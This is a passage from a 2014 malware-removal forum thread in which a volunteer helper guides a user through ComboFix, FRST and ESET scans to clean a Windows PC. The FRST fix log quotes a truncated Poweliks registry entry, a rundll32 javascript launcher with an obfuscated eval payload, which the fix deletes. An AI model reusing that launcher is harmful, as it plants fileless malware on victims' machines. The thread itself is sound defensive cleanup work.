c:\users\Ice\AppData\Local\Temp\_MEI29882\_socket.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_ssl.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\hashobjs_ext.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\pyexpat.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\pysqlite2._sqlite.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\python27.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\pythoncom27.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\PyWinTypes27.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\select.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\unicodedata.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32api.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32com.shell.shell.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32crypt.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32event.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32file.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32gui.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32inet.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32pdh.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32pipe.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32process.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32profile.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32security.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32ts.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\windows._lib_cacheinvalidation.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._animate.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._controls_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._core_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._gdi_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._html2.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._misc_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._windows_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._wizard.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxbase294u_net_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxbase294u_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_adv_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_core_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_html_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_webview_vc90.dll
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-03 to 2014-08-03  )))))))))))))))))))))))))))))))
.
.
2014-08-03 02:52 . 2014-08-03 02:52    --------    d-----w-    c:\windows\ERUNT
2014-08-03 02:51 . 2014-08-03 02:51    12872    ----a-w-    c:\windows\system32\bootdelete.exe
2014-08-03 02:41 . 2014-08-03 02:41    --------    d-----w-    c:\users\Ice\AppData\Local\CrashDumps
2014-08-03 02:34 . 2014-08-03 04:24    29160    ----a-w-    c:\windows\SysWow64\drivers\TrueSight.sys
2014-08-03 02:34 . 2014-08-03 02:34    --------    d-----w-    c:\programdata\RogueKiller
2014-08-03 01:40 . 2014-08-03 09:11    --------    d-----w-    C:\FRST
2014-08-03 00:30 . 2010-08-30 13:34    536576    ----a-w-    c:\windows\SysWow64\sqlite3.dll
2014-08-03 00:26 . 2014-08-03 00:26    --------    d-----w-    c:\program files\HitmanPro
2014-08-03 00:26 . 2014-08-03 01:21    --------    d-----w-    c:\programdata\HitmanPro
2014-08-03 00:24 . 2014-08-03 04:18    --------    d-----w-    C:\AdwCleaner
2014-08-02 22:21 . 2014-08-03 10:07    122584    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-02 22:20 . 2014-08-02 22:20    --------    d-----w-    c:\program files (x86)\Malwarebytes Anti-Malware
2014-08-02 22:20 . 2014-05-12 12:26    63704    ----a-w-    c:\windows\system32\drivers\mwac.sys
2014-08-02 22:20 . 2014-05-12 12:26    91352    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2014-08-02 22:06 . 2014-08-03 08:15    --------    d-----w-    c:\users\Ice\AppData\Roaming\Lavasoft
2014-08-02 21:59 . 2014-08-02 21:59    --------    d-----w-    c:\programdata\BitDefender
2014-08-02 21:55 . 2014-08-02 21:55    --------    d-----w-    c:\program files\Lavasoft
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\programdata\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\program files\iTunes
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\program files (x86)\iTunes
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\program files\iPod
2014-08-01 04:30 . 2014-08-01 04:30    --------    d-----w-    c:\program files\Bonjour
2014-08-01 04:30 . 2014-08-01 04:30    --------    d-----w-    c:\program files (x86)\Bonjour
2014-07-23 20:29 . 2014-08-02 21:45    --------    d-----w-    c:\programdata\1d41b52c7ef528a8
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Ice\AppData\Local\Packages
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Ice\AppData\Local\Comodo
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\HomeGroupUser$
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Guest
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Administrator
2014-07-17 15:07 . 2014-07-17 15:07    --------    d-----w-    c:\programdata\Riot Games
2014-07-12 06:26 . 2014-07-12 06:27    --------    d-----w-    c:\program files (x86)\Awakening - The Sunhook Spire
2014-07-12 03:37 . 2014-07-12 03:37    --------    d-----w-    c:\users\Ice\AppData\Roaming\Rainbow
2014-07-12 02:03 . 2014-07-12 02:04    --------    d-----w-    c:\program files (x86)\Awakening - The Skyward Castle
2014-07-12 02:02 . 2014-07-12 02:02    --------    d-----w-    c:\users\Ice\AppData\Roaming\Digital Quarter
2014-07-12 01:57 . 2014-07-12 01:57    --------    d-----w-    c:\program files (x86)\Awakening - The Goblin Kingdom
2014-07-12 00:45 . 2014-07-12 00:45    --------    d-----w-    c:\users\Ice\AppData\Roaming\Nevosoft
2014-07-11 20:44 . 2014-07-11 20:44    --------    d-----w-    c:\users\Ice\AppData\Roaming\LestaStudio
2014-07-11 17:16 . 2014-07-11 17:16    --------    d-----w-    c:\users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 14:36 . 2014-07-11 14:36    --------    d-----w-    c:\program files (x86)\Awakening - Moonfell Wood
2014-07-11 14:35 . 2014-07-11 14:36    --------    d-----w-    c:\program files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 14:34 . 2014-07-11 14:35    --------    d-----w-    c:\program files (x86)\Awakening Kingdoms
2014-07-11 14:32 . 2014-07-11 14:32    --------    d-----w-    c:\program files (x86)\Northern Tale
2014-07-11 14:31 . 2014-07-11 14:32    --------    d-----w-    c:\program files (x86)\Royal Envoy 3
2014-07-11 14:24 . 2014-07-11 14:25    --------    d-----w-    c:\program files (x86)\Dark Manor - A Hidden Object Mystery
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-08-03 10:06 . 2010-06-24 16:33    23256    ----a-w-    c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-07-09 01:39 . 2013-06-08 01:57    699056    ----a-w-    c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-09 01:39 . 2011-08-19 00:08    71344    ----a-w-    c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-05-12 12:25 . 2014-02-22 23:03    25816    ----a-w-    c:\windows\system32\drivers\mbam.sys
2014-05-07 20:02 . 2014-05-29 16:20    98216    ----a-w-    c:\windows\SysWow64\WindowsAccessBridge-32.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"GoogleDriveSync"="c:\program files (x86)\Google\Drive\googledrivesync.exe" [2014-06-27 24477056]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2010-11-21 1475584]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-07-08 152392]
.
c:\users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
CurseClientStartup.ccip [2014-7-6 0]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro37Crusader]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro37CrusaderBoot]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;c:\program files (x86)\Dragon Age\bin_ship\DAUpdaterSvc.Service.exe;c:\program files (x86)\Dragon Age\bin_ship\DAUpdaterSvc.Service.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 PCDSRVC{1E208CE0-FB7451FF-06020101}_0;PCDSRVC{1E208CE0-FB7451FF-06020101}_0 - PCDR Kernel Mode Service Helper Driver;c:\program files\dell support center\pcdsrvc_x64.pkms;c:\program files\dell support center\pcdsrvc_x64.pkms [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW76.sys;c:\windows\SYSNATIVE\drivers\AtihdW76.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\Drivers\RtsUStor.sys;c:\windows\SYSNATIVE\Drivers\RtsUStor.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MBAMSWISSARMY
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-03 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-06-08 01:39]
.
2014-07-27 c:\windows\Tasks\PCDoctorBackgroundMonitorTask.job
- c:\program files\Dell Support Center\uaclauncher.exe [2011-03-22 17:20]
.
2014-08-02 c:\windows\Tasks\SystemToolsDailyTest.job
- c:\program files\Dell Support Center\pcdrcui.exe [2011-03-22 17:20]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveBlacklistedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedViewOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncingOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
mStart Page = about:blank
mLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://www.google.com
uInternet Settings,ProxyOverride = *.local
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
FF - ProfilePath - c:\users\Ice\AppData\Roaming\Mozilla\Firefox\Profiles\rxekvrwp.default-1407025147172\
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/search?q=weather+willowbrook%2C+il&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=sb
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Toolbar-Locked - (no file)
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCDSRVC{1E208CE0-FB7451FF-06020101}_0]
"ImagePath"="\??\c:\program files\dell support center\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
.
**************************************************************************
.
Completion time: 2014-08-03  05:10:38 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-03 10:10
.
Pre-Run: 738,763,202,560 bytes free
Post-Run: 738,986,741,760 bytes free
.
- - End Of File - - EC08C4D9619C8EA27228361BB175F04A
 



#6 icelore

icelore
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:03:43 PM

Posted 03 August 2014 - 05:20 AM

Whatever Combo fix did, I'm not getting the MalwareBytes warning for the attempted connection, nor do I see any of the processes active...thus far at least.  *fingers crossed*

 

Is that it?  o.o



#7 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:43 PM

Posted 03 August 2014 - 06:08 AM

Let's do a check up.
Make sure that these dllhost.exe processes aren't active before executing step 1.


Step 1

Please download this attached Attached File  fixlist.txt   252bytes   8 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 3

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#8 icelore

icelore
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:03:43 PM

Posted 03 August 2014 - 06:40 PM

Still no errant processess or warnings today, so yay for that.  Here is the Fixlog and I will run the ESET Scanner tonight when I'm done with the computer.  The log for that as well as the last FRST scan will be up tomorrow.

 

~~~

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-08-2014
Ran by Ice at 2014-08-03 18:22:24 Run:1
Running from C:\Users\Ice\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Reboot:

*****************

"HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.


The system needed a reboot.

==== End of Fixlog ====

 

 



#9 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:43 PM

Posted 10 August 2014 - 10:01 AM

Ok, looks good. I'm waiting for the ESET log.

#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:43 PM

Posted 03 September 2014 - 06:00 AM

Do you still need help?

#11 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:43 PM

Posted 19 September 2014 - 02:40 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users